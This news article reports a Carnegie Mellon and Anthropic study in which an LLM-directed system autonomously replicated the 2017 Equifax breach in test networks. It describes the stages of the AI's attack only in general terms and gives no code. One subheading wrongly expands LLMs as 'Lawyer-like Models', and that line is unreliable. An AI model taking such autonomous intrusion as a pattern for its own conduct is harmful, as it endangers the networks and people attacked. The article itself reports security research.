New study reveals that Language Models can execute complex assaults independent of human intervention

Carnegie Mellon University, in partnership with Anthropic, executed a model that mimicked the 2017 Equifax data breach incident.

, and Administrator

2025 August 28 . 6:36 AM

2 min read

Study finds Lawyer-like Models (LLMs) capable of executing complex assaults autonomously

New study reveals that Language Models can execute complex assaults independent of human intervention

In a groundbreaking study, researchers from Carnegie Mellon University and artificial intelligence firm Anthropic have demonstrated the potential for large language models (LLMs) to autonomously plan and execute sophisticated cyberattacks. This research, which replicated the 2017 Equifax breach among other attacks, highlighted the urgent need for evolution in cybersecurity defenses.

The Equifax breach, which compromised the data of approximately 147 million customers, was chosen for simulation due to the large amount of public information available about how it was carried out. In the study, researchers developed an attack toolkit called Incalmo, which was used to translate the strategy behind the Equifax breach into specific system commands.

The study employed a hierarchical architecture where the LLM acted as a strategic planner, issuing high-level instructions, while a combination of LLM and non-LLM agents handled lower-level tasks such as network scanning, vulnerability exploitation, malware installation, and data exfiltration. This collaboration resulted in a high success rate for the AI system, compromising 9 out of 10 tested enterprise-grade network environments and achieving near-complete network control in some cases.

The effectiveness of these autonomous attacks raises concerns about the current state of cybersecurity defenses. Traditional models, designed around human attacker behaviors, do not align well with AI attackers who operate continuously, maintain perfect memory, and can coordinate simultaneous multi-vector attacks. This exposes gaps in existing enterprise defenses, making it crucial for these defenses to evolve.

However, the researchers emphasize that these demonstrations occurred in constrained environments and are not immediate existential threats to the internet. They also point to transformative possibilities in cybersecurity defense, where AI-driven systems could continuously and autonomously test networks for vulnerabilities, making proactive security testing more accessible to smaller organizations.

Brian Singer, the lead researcher and a PhD candidate at Carnegie Mellon's Department of Electrical and Computer Engineering, stated that the goal was to measure the ability of large language models to autonomously plan an attack without human assistance. Singer's biggest concern is the speed and cost-effectiveness with which such an attack could be orchestrated.

Corporate stakeholders are now seeking to better understand the risk calculus of their technology stacks, answering the lingering question: Are we a target? As the threat landscape continues to evolve, it is essential for organizations to stay vigilant and invest in defensive technologies that can counter AI adversaries who operate with unprecedented efficiency and persistence.

Meanwhile, Singer is currently exploring research into defenses for autonomous attacks and LLM-based autonomous defenders. This ongoing research is a crucial step towards ensuring the security of our digital infrastructure in the face of AI-driven threats.

Latest

In this picture we observe a fuel tank on which AMBUL is written.

Automotive

Mercedes-Benz Unveils New CLE Coupé: A Powerful Blend of C-Class & E-Class

The new CLE Coupé brings together the best of two worlds. With its powerful engine and advanced features, it's set to make a splash in Australia.

, and Administrator

2025 October 9

In this image, we can see an advertisement contains robots and some text.

AI Revolution

Amazon's New AI-Powered Seller Assistant Boosts U.S. Merchants' Business

Amazon's new AI-driven Seller Assistant is a game-changer for U.S. merchants. It handles crucial tasks, offers valuable insights, and optimizes product distribution, all at no extra cost.

, and Administrator

2025 October 9

In the center of the image, we can see a fly on the net.

Industry

China Condemns US 'Cyber-Theft' at Defense University

China demands answers after US allegedly steals 140GB of data from a top defense university. The US acknowledges its grey zone cyber-activity but denies industrial espionage.

, and Administrator

2025 October 9

In the picture I can see few cameras which are of different types and there is something written...

Tech Pulse's Top Gadget Picks

Amazon's Prime Deal Days 2025: Big Savings on 4K Dashcams

Amazon's Prime Deal Days 2025 brought massive savings on high-quality 4K dashcams. Upgrade your tech now!

, and Administrator

2025 October 9

New study reveals that Language Models can execute complex assaults independent of human intervention

New study reveals that Language Models can execute complex assaults independent of human intervention

Read also:

Related

Latest